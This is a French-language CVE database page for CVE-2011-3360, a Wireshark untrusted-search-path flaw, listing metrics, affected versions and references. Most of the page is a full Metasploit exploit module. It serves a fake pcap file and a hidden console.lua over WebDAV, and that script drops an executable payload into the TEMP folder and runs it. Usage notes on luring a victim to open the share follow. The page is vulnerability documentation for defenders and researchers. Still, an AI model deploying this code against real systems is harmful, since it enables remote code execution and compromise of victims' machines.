CVE-2011-3360 : Détail

CVE-2011-3360

65.77%V4
Network
2011-09-20
08h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Untrusted search path vulnerability in Wireshark 1.4.x before 1.4.9 and 1.6.x before 1.6.2 allows local users to gain privileges via a Trojan horse Lua script in an unspecified directory.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 18125

Date de publication : 2011-11-18 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Wireshark console.lua pre-loading vulnerability", 'Description' => %q{ This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8 }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', #Metasploit ], 'References' => [ ['CVE', '2011-3360'], ['OSVDB', '75347'], ['URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136'], ['URL', 'http://technet.microsoft.com/en-us/security/advisory/2269637'] ], 'Payload' => { 'BadChars' => "\x00", }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'win', 'Targets' => [ ['Wireshark 1.6.1 or less', {}], ], 'Privileged' => false, 'DisclosureDate' => "Jul 18 2011", #Didn't go public until 2011-09-21 though 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('SHARENAME', [ true, "The name of the top-level share.", "files"]), OptString.new('URIPATH', [ true, "The URI to use", "/" ]), OptString.new('FILENAME', [ true, "The name of the pcap file", "msf.pcap"]) ], self.class) deregister_options('SSL', 'SSLVersion') # WebDAV does not support SSL end def on_request_uri(cli, request) case request.method when 'OPTIONS' process_options(cli, request) when 'PROPFIND' process_propfind(cli, request) when 'GET' process_get(cli, request) else print_status("#{cli.peerhost}:#{cli.peerport} #{request.method} => 404 (#{request.uri})") resp = create_response(404, "Not Found") resp.body = "" resp['Content-Type'] = 'text/html' cli.send_response(resp) end end def process_get(cli, request) print_status("URI requested: #{request.uri.to_s}") if request.uri =~ /\.lua$/ # Load lua script print_status("Sending lua script") send_response(cli, @p, {'Content-Type'=>'application/octet-stream'}) elsif request.uri =~ /#{datastore['FILENAME']}/ # Load an empty pcap file # Format reference: http://wiki.wireshark.org/Development/LibpcapFileFormat pcap = '' pcap << "\xd4\xc3\xb2\xa1" #Magic number pcap << "\x02\x00" #Major version number pcap << "\x04\x00" #Minor version number pcap << "\x00\x00\x00\x00" #GMT to local correction pcap << "\x00\x00\x00\x00" #Accuracy of timestamp pcap << "\xff\xff\x00\x00" #Maxlength of captured packets in octets pcap << "\x01\x00\x00\x00" #Data length type print_status("Sending fake pcap file") send_response(cli, pcap, {'Content-Type'=>'application/octet-stream'}) else # Don't know the request, return not found print_error("Don't care about this file, 404") send_not_found(cli) end return end def process_options(cli, request) vprint_status("#{cli.peerhost}:#{cli.peerport} OPTIONS #{request.uri}") headers = { 'MS-Author-Via' => 'DAV', 'DASL' => '<DAV:sql>', 'DAV' => '1, 2', 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', 'Cache-Control' => 'private' } resp = create_response(207, "Multi-Status") headers.each_pair {|k,v| resp[k] = v } resp.body = '' resp['Content-Type'] = 'text/xml' cli.send_response(resp) end def process_propfind(cli, request) path = request.uri vprint_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}") body = '' my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] my_uri = "http://#{my_host}/" if path !~ /\/$/ if path.index(".") print_status("Sending 404 for #{path} ...") resp = create_response(404, "Not Found") resp['Content-Type'] = 'text/html' cli.send_response(resp) return else print_status("Sending 301 for #{path} ...") resp = create_response(301, "Moved") resp["Location"] = path + "/" resp['Content-Type'] = 'text/html' cli.send_response(resp) return end end print_status("Sending directory multistatus for #{path} ...") body = <<-BODY <?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> <lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> BODY body = body.gsub(/^\t\t/, '') if request["Depth"].to_i > 0 if path.scan("/").length < 2 body << generate_shares(path) else #Set filenames, and set the hidden attribute filenames = [ ['console.lua', true], [datastore['FILENAME'], false] ] body << generate_files(path, filenames) end end body << "</D:multistatus>" body.gsub!(/\t/, '') # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml; charset="utf8"' cli.send_response(resp) end def gen_timestamp(ttype=nil) ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT") end def gen_datestamp(ttype=nil) ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ") end def generate_shares(path) share_name = datastore['SHARENAME'] share = <<-SHARE <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}#{share_name}/</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> SHARE share = share.gsub(/^\t\t/, '') return share end def generate_files(path, items) trail = path.split("/") return "" if trail.length < 2 files = "" items.each do |f, hide| h = hide ? '1' : '0' files << <<-FILES <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}#{f}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <lp2:executable>T</lp2:executable> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> <D:ishidden b:dt="boolean">#{h}</D:ishidden> </D:propstat> </D:response> FILES end files = files.gsub(/^\t\t\t/, '') return files end def get_lua_payload # Generate our executable payload, and then convert every byte # in decimal format p = generate_payload_exe buf = '' p.each_byte do |b| buf << "\\#{b.to_s}" end # Create the lua script that contains our payload var_payload_name = rand_text_alpha(5) var_temp_name = rand_text_alpha(5) lua_script = <<-LUA #{var_payload_name} = "#{buf}" #{var_temp_name} = os.getenv("TEMP") .. os.tmpname() .. ".exe" local f = io.open(#{var_temp_name}, "wb") f:write(#{var_payload_name}) f:close() os.execute(#{var_temp_name}) LUA lua_script = lua_script.gsub(/^\t\t/, '') return lua_script end def exploit @p = get_lua_payload super end end =begin Example of how to open the share: My Computer -> Tools -> Map Network Driver -> Sign up for online storage or connect to a network server -> Choose another network location -> enter the network address On an unpatched XP SP3 (and other Windows systems), the ideal URI format is like this: http://192.168.1.11/ But on a fully patched XP SP3, the same URI format will not work. Windows will try to list the share via SMB, and the victim will not see the share. In this case, you should specify the URI to like this: http://192.168.1.11/files =end

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version 1.4.0

Wireshark>>Wireshark >> Version 1.4.1

Wireshark>>Wireshark >> Version 1.4.2

Wireshark>>Wireshark >> Version 1.4.3

Wireshark>>Wireshark >> Version 1.4.4

Wireshark>>Wireshark >> Version 1.4.5

Wireshark>>Wireshark >> Version 1.4.6

Wireshark>>Wireshark >> Version 1.4.7

Wireshark>>Wireshark >> Version 1.4.8

Configuraton 0

Wireshark>>Wireshark >> Version 1.6.0

Wireshark>>Wireshark >> Version 1.6.1

Références

http://www.debian.org/security/2011/dsa-2324
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.openwall.com/lists/oss-security/2011/09/14/5
Tags : mailing-list, x_refsource_MLIST
http://osvdb.org/75347
Tags : vdb-entry, x_refsource_OSVDB
http://www.mandriva.com/security/advisories?name=MDVSA-2011:138
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.openwall.com/lists/oss-security/2011/09/13/1
Tags : mailing-list, x_refsource_MLIST